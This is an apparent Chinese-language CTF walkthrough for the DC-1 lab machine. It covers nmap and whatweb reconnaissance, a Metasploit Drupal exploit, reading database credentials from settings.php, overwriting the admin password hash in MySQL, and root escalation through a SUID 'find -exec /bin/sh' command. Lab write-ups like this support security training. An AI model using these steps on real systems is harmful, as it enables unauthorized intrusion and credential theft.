靶机DC-1攻略

靶机DC-1攻略

  • 实验环境搭建

1.1、所需工具

1.1.1、vbox:用于虚拟环境搭建

1.1.2、Kali操作系统:攻击机

1.1.3、DC-1:攻击目标靶机

靶机DC-1攻略_第1张图片

1.2、环境配置

1.2.1网络配置:网络均采用桥接模式保证网络在同一个段

靶机DC-1攻略_第2张图片

Kali的IP为:192.168.1.6

DC-1的IP未知需要自己获取

  • 渗透步骤

2.1信息收集

2.1.1获取目标IP

DC-1的IP是未知的使用nmap -sP 来获取

靶机DC-1攻略_第3张图片分析可知DC-1的IP为192.168.1.7

得知IP后使用nmap -A查看靶机开启的端口

靶机DC-1攻略_第4张图片

 一共开启三个端口ssh、http和111,可以先尝试访问http靶机DC-1攻略_第5张图片

可以使用whatweb -v 192.168.1.7分析平台架构获取平台信息

靶机DC-1攻略_第6张图片

2.2漏洞查询

2.2.1进入msfconsole

靶机DC-1攻略_第7张图片

2.2.2使用search Drupa查找对应的漏洞模块

靶机DC-1攻略_第8张图片

2.2.3找到可利用点

靶机DC-1攻略_第9张图片

2.2.4 利用use使用的漏洞

2.2.5使用show options 检查利用漏洞所需要的配置

靶机DC-1攻略_第10张图片

2.3开始进行渗透测试

2.3.1 使用set RHOSTS建立攻击机和靶机之间的联系

2.3.2 使用exploit启动链接

靶机DC-1攻略_第11张图片

2.3.3 使用sysinfo查看DC-1的基本信息

靶机DC-1攻略_第12张图片

2.3.4 获得shell

靶机DC-1攻略_第13张图片

2.3.5为了方便查看使用python进行反弹python -c 'import pty;pty.spawn("/bin/bash")'

3.1获取flag

3.1.1cat flag1.txt(小彩蛋)*每个好的CMS都需要一个配置文件-你也是。*

3.1.2查看配置文件cat ./sites/default/settings.php

靶机DC-1攻略_第14张图片

3.1.3利用查找到的数据库文件尝试登录

靶机DC-1攻略_第15张图片

3.1.4成功登录对方数据库后查看对方数据库

靶机DC-1攻略_第16张图片

3.1.5进入到数据库中

靶机DC-1攻略_第17张图片

3.1.6查看表show tables;(发现users表)

靶机DC-1攻略_第18张图片

3.1.7查看表中内容select * from users\G;

3.1.8admin的密码给加密,需要找到加密文件find . -name “*hash*”并且运行该文件./scripts/password-hash.sh

直接再后面加密码就会返回加密后的结果

3.1.9简单测试是否能修改./scripts/password-hash.sh 123456

靶机DC-1攻略_第19张图片

3.1.10在web界面查看是否修改成功

靶机DC-1攻略_第20张图片

4.1使用SUID提权

4.1.1查看初始权限(whoami)

4.1.2使用find / -name cron.php -exec "/bin/sh" \;提权

5.1获取最终权限

5.1.1进入root 查看文件

5.1.2获取最终flag

靶机DC-1攻略_第21张图片

6总结

1.nmap,arp-scan使用

2.whatweb 指纹识别

3.msf使用对应的模块

4.mysql的修改数据

5.SUID提权

你可能感兴趣的:(网络,安全)